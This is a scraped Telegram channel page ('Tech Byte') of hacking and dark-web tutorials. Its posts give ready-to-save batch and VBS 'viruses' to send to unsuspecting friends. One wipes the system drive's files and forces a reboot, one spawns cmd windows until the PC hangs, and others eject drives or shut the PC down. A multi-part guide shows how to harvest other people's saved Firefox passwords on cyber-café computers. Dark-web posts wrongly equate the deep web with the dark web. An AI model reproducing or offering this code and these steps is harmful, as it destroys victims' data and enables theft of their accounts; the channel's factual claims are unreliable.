techbyte | Unsorted

Telegram-канал techbyte - Tech Byte™

7928

Tech tricks, news, hacking tutorials and dark web guides. Admin : @anonyguy

Subscribe to a channel

Tech Byte™

There's how to install Kali Linux on a Windows PC.

To download Kali, go to kali.org/downloads and choose a version matching your device specifications. Alternatively, you can download the Light version right here, in this channel. I couldn't upload the other versions because they are all over 2GB in size, which exceeds Telegram's 1.5GB file size limit.

After downloading and installing Kali, you can go to kalitutorials.net to find your way around the terminal, I'll keep sharing Kali tutorials here, so stay tuned.

@TechByte

Читать полностью…

Tech Byte™

I've got lots of messages about what the commands in the codes mean, so let's use virus 4 to explain them.

@echo - This will display anything in the command prompt (cmd) shell, if we set this as off(as in "@echo off), nothing in the rest of the code will be seen in the cmd shell.

:top - This will be our starting point of our loop.

start - This opens one cmd window

goto - This will make the scipt (or virus) go to any text within the code. [Example; "goto top" will go to the point with ":top" and start from there].

So according to this, the script will force the system to open a blank cmd window, then another, and another...untill the system runs out of RAM.

To get out of this loop, simply reboot your PC, since you can't do it by pointing the mouse (because your PC will be hanging like heck by then), you'll be forced to shutdown by pressing the physical power button on your PC.

Читать полностью…

Tech Byte™

3⃣This virus deletes the Contents of a Drive
Type this in Notepad:

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save the above code as "FileName.bat"

@TechByte | @GEEKernel

Читать полностью…

Tech Byte™

1⃣Continually pop out your friend’s CD Drive. If they have more than one, it pops out all of them!
Copy and type this Code in Notepad:

Set oWMP = CreateObject(“WMPlayer.OCX.”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count>= 1 then
For i = 0 to colCDROMs.Count– 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count– 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep5000
loop

Save it as “FileName.vbs” and send it to an unsuspecting friend.

@TechByte

Читать полностью…

Tech Byte™

Remember, this may be considered rude, or creepy and illegal in most places, and if you get caught, you may be fined or punished, but...

...who cares, right? It's definitely worth it! I'm kidding, I'm letting you know this for educational purposes, what you choose to do with this knowledge is up to you.


Please consider giving us an honest rating and review: http://t.me/tchannelsbot?start=TechByte

Читать полностью…

Tech Byte™

2⃣Head over to the Security tab and click Saved Passwords... or simply press P

@TechByte | @RLchannels

Читать полностью…

Tech Byte™

Viewing Stored Passwords...
</lesson_001:> ...in Firefox Browser

Ever gone to a cyber café and wished, "oh, man. I wish I knew all the passwords of all the people who logged in to their social accounts on these computers", well, wish granted!

Even though we all know it's a bad idea, a lot of people still use their browser's store password function to keep up with all their accounts. While convenient, this shortcut also makes their passwords very easy to find if you have access to the computer they're stored on.

This guide shows you how to view saved passwords in Mozilla Firefox Web Browser

Читать полностью…

Tech Byte™

For the list of the dark web sites, the Hidden Wiki has all of them.

The Hidden Wiki is a repository of the most visited websites in the dark web. It has them classified into categories, i.e. Forums, Drugs, Erotica, Blogs...,etc

Here's the Hidden Wiki link (You can even visit it in the clearnet, using an ordinary web browser): thehiddenwiki.org

For an even more comprehensive list, head over to the deep web subreddit: reddit.com/r/deepweb/

Читать полностью…

Tech Byte™

Accessing the Deep Web
</lesson_002(revised):> Fire.onion

This guide is actually pretty easy and doesn't require the installation of many apps.

There's this app called Fire.onion, it's a normal web browser like Chrome or Firefox, but it's preconfigured to use Tor. Once you launch it, it will directly connect to the Tor network and you can start browsing the dark web like nobody's business. It also relays your communications through thousands of computers around the world, pinging it back and forth and this helps hugely in anonymity and masking your IP address.

You can download the browser from your app store or from the next post. Unfortunately, Fire.onion is only available for Android, but iOS users don't give up yet, there's plently of alternative ways to browse the dark web.

PM me, @romL3N, if you have further questions.

Читать полностью…

Tech Byte™

3⃣ Install Orfox

Orfox is built from the same source code as Tor Browser (which is built upon Firefox), but with a few minor modifications to the privacy enhancing features to make them compatible with Firefox for Android and the Android operating system. Orfox REQUIRES Orbot for Android to connect to the Tor network.

The Tor software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets you access sites which are blocked.

From here on you're on your own. Remember, don't download things unnecessarily on the dark web, and my personal rule; If you see anything suspicious on the dark web, run away from it!

Browse the hidden web using .onion links on thehiddenwiki.org

Get it: /channel/RLapps/82

@TechByte

Читать полностью…

Tech Byte™

1⃣ Install OrWall

Developed by Swiss privacy activist Cédric Jeanneret, OrWall is essentially a firewall for your Android that will force all of your apps (or just the ones you select) to use the Tor network to transmit all of their data. If an app is unable to use the Tor network to access the internet, then that data connection will be blocked.

Launch it, select the apps you want to relay the Tor network into, and reboot your device.

Get: /channel/RLapps/81

Читать полностью…

Tech Byte™

Finding .onion websites

Now that you have what looks like Mozilla Firefox running in front of you, ou can simply enter normal URLs and enjoy surfing the web with privacy. However, we are here to browse the dark web, and we have no idea what to enter in the URL bar.

The solution is simple, just head over to the hidden wiki (click on the button below for the link; it opens only on Tor Browser), and you'll have a list of websites you can go to. You are now surfing the dark web. This is the furthest I'm taking you, and from here on, you can go wherever you want. You can simply click URLs on the hidden wiki like you'd do on a regular browser, and the website would open. Regardless of what happens behind the scenes, the user experience from here on is what it's like in the clear web.

You can explore the dark web but don't do anything illegal, because even if Tor masks your IP address and makes you anonymous, you don't know who's watching you.

@TechByte

Читать полностью…

Tech Byte™

Understanding the Deep Web

The deep Web, sometimes called the invisible Web or the dark web, is the large part of the internet that is inaccessible to conventional search engines. Deep Web content includes email messages,chat messages, private content on social media sites, electronic bank statements, electronic health records (EHRs) and other content that is accessible over the Internet but is not crawled and indexed by search engines like Google, Yahoo, Bing or DuckDuckGo.

Statistics show that the clear web (visible web; the one we surf normally) contains only 4% of the Internet's content, the dark web contains the remaining 96%. These may include drug deals, child porn, and other illegal stuff

@TechByte

Читать полностью…

Tech Byte™

Sorry, I couldn't do that tutorial on SMS spoofing. While there are many 'software' and websites that help you do that online, all of them are pricy and the creators track every text you send.

There was a way to do that without spending a cent and without being spied on but it requires you to install BackTrack 5, an outdated Linux distribution. As I mentioned BackTrack is outdated and replaced with Kali, so the downloads are discontinued. (No website, legally, offers BT downloads these days).

As I said, I'm sorry, I'll make it up to you when I do another tutorial, this time that requires Kali Linux, which you probably already have since the WiFi hack we did some time back.

Читать полностью…

Tech Byte™

Contacts
This new touchwiz UI is the next big thing. I love the navbar buttons

Читать полностью…

Tech Byte™

Install Kali 2.0

Dual-Boot: docs.kali.org/installation/dual-boot-kali-with-windows

Virtual Machine: www.computersnyou.com/1626/how-to-install-kali-linux-in-virtual-machine-step-by-step/

Читать полностью…

Tech Byte™

4⃣Open Infinite cmd.exe windows to crash PC
Type this in Notepad.

@echo off
:top
start
goto top

Save it as FileName.bat

Читать полностью…

Tech Byte™

2⃣Convey your friend a little message and shut down his / her computer:
Type this code:

@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s

Save it as FileName.vbs and send it. Make sure they open the file for it to work.

Читать полностью…

Tech Byte™

Writing a Computer Virus
</lesson_001:> ...using Notepad

Ever wanted to code a virus? Even just a simple one? I'm going to show you how to write some

Most of us are new at coding so I'm just gonna start with the basic simple ones.

All you need to have is your Windows 7/8/10 PC and a text editor, I prefer to use Notepad since it's preinstalled.

Читать полностью…

Tech Byte™

3⃣This screen pops up and you can see all the passwords that were used to sign in to a website.

@TechByte | @RLchannels

Читать полностью…

Tech Byte™

1⃣Firefox users running Windows, first open the main menu (Firefox) in the upper left-hand corner and select Options. If you're on a Mac, hit Firefox, then Preferences.

@TechByte | @RLchannels

Читать полностью…

Tech Byte™

👍Do you like this channel? Share it to your friends.

ℹ️ t.me/TechByte

🌟Rate us » t.me/tchannelsbot?start=TechByte

👣Join us on Facebook: https://fb.me/GEEKernel

👥Join our Telegram group: /channel/GEEKernel

Читать полностью…

Tech Byte™

Fire.onion | Browser + Tor
😉Heaven in apk format😄
By @TechByte

Читать полностью…

Tech Byte™

As a bonus, Orbot also works as a VPN app, because it masks your IP address (and changes it) and prevents people from "seeing" your activity on the web.

Читать полностью…

Tech Byte™

2⃣ Install Orbot

In its simplest form, Orbot, by the great people over at the Guardian Project, is the connector between your device and the Tor network. It facilitates the passage of data from your apps to the Tor network, but it can only do so with apps that support data being sent through a proxy. Because of that limitation, it's necessary to have both Orbot and OrWall installed on your device, since OrWall will help with apps which do not have proxy support.

The first time you open the app, you'll have to complete the set-up wizard, but afterwards, all you have to do is long-press the Power button in the center to activate Orbot. If at any time you want to change your Tor Identity to a different IP address, you can swipe across the main screen, which will come in handy if you don't want to stay on the same IP address for too long.

Get: /channel/RLapps/80

Читать полностью…

Tech Byte™

Accessing the Deep Web
</lesson_002:> ...on Android (Guardian Project)

Keeping your online data and identity private is an uphill battle, but with the anonymity network Tor, you have a pretty decent line of defense from prying eyes. But while Tor is great for desktop users, since they can simply install a Tor browser or plugin, it's a bit more complicated on Android. The difficulty lies in getting all the data your device sends out pushed through the Tor network, which anonymizes by sending data through various servers around the world.

Luckily, I'm here to set you on the right path... (No Applause!?👏😺)

The guide I'm about to share needs a rooted device. If it isn't rooted, you can Google how gain root access on your device.

@TechByte

Читать полностью…

Tech Byte™

How to Access The Dark Web

There are many ways to access the dark web. Being a part of the deep net, dark web operates differently than the clear-net, and needs special client software to be accessed. While there are multiple ways to access the dark web, the most common and recommended method involves using TOR, and then visiting the .onion websites. All dark web website have a URL with .onion domain, which looks similar to the way the clear-net websites have .com, .org, .net, etc. Once you have TOR and find out the .onion address of a deep web site (hidden web site),you can simply enter it in the URL bar on TOR browser, and it'll open, just as normal websites open in usual browsers.

If you read the previous boring section, you'd see that I mentioned how the dark net often uses uncommon communication protocols, etc. In case of the dark web, we see that phenomenon with respect to the onion websites. I won't go in much depth, but first look at a .onion URL suggests that it's similar to the clear-net websites. However, internally, the way they work is nothing similar to the clear-net. Precisely, .onion is not part of the internet's DNS root, and hence, normal DNS servers can't resolve your request if you type the URL of a .onion website on your browser. TOR redirects these requests through it's own servers, similar to the way proxies work, and then we get to the website, without the involvement of DNS servers anywhere. This ensures that search engine bots can't browse around the deep web, and that anonymity is maintained, both of the client looking at the web pages, as well as the server serving the web pages (In other words, the server doesn't know who the client is, and the client doesn't know anything about where the server is.)

If you're using Windows, you can download the Tor executable below, if you're on another OS (Linux, MacOS), tap on the button below the file.

@TechByte

Читать полностью…

Tech Byte™

Accessing the Deep Web
</lesson_001:> Tor Networking

In this guide, I'll show you how to access the deep/dark/invisible web. You don't need special coding or hacking skills to do it. Stay tuned!

Читать полностью…

Tech Byte™

I'll be dropping a massive hacktorial (hacking tutorial) 10 or 11 hours from now. In the meantime, share this channel to as many people as possible.
Use this invite link below:

https://t.me/joinchat/AAAAAEA5gUa5uDrWT7mepg

Читать полностью…

Tech Byte™

Home screen (S8) and the lockscreen (S8+). Notice the absence of the physical home button? The fingerprint scanner is now at the back, on the right, next to the camera

Читать полностью…
Subscribe to a channel